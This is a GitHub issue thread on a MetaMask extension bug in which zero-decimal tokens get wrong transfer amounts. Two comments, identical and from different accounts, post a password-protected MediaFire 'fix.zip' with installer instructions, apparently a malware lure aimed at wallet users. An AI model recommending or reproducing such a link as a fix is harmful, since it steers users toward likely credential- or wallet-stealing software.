### ISSUE TITLE
[Bug]: When the currency decimal is 0, the transfer accuracy is wrong.

### ISSUE THREAD

**Issue by ersan623** [MetaMask/metamask-extension#26646]
### Describe the bug

When the currency decimal is 0, if the entered transfer amount is less than the balance, an error will be reported and the transfer will not be possible. When clicking the max button, the fill amount is 0.000000000000000009

### Screenshots/Recordings

![img_v3_02e4_b8499f67-f174-45d6-a120-45339eff82hu](https://github.com/user-attachments/assets/318fb2b5-0daf-403f-b391-13a3d97ae575)
![img_v3_02e4_609fa804-2e65-4c80-b2d4-c11f509daehu](https://github.com/user-attachments/assets/b3ddc608-640d-4f4d-8a7e-aaf4e8462b18)

### Steps to reproduce

1. Select a token whose decimal point is 0
2. Click Send and fill in the acceptance address
3. On the sending page, when filling in the sending amount, fill in a value less than the amount or click the maximum button

### Detection stage

In production (default)

### Version

12.0.5

### Build type

None

### Browser

Chrome

### Operating system

Windows

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ersan623** [comment]
Use version 11.16.13 to transfer and the accuracy is normal.
![image](https://github.com/user-attachments/assets/19da64bd-d890-4af2-a24c-3dc3bfd3e86c)

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
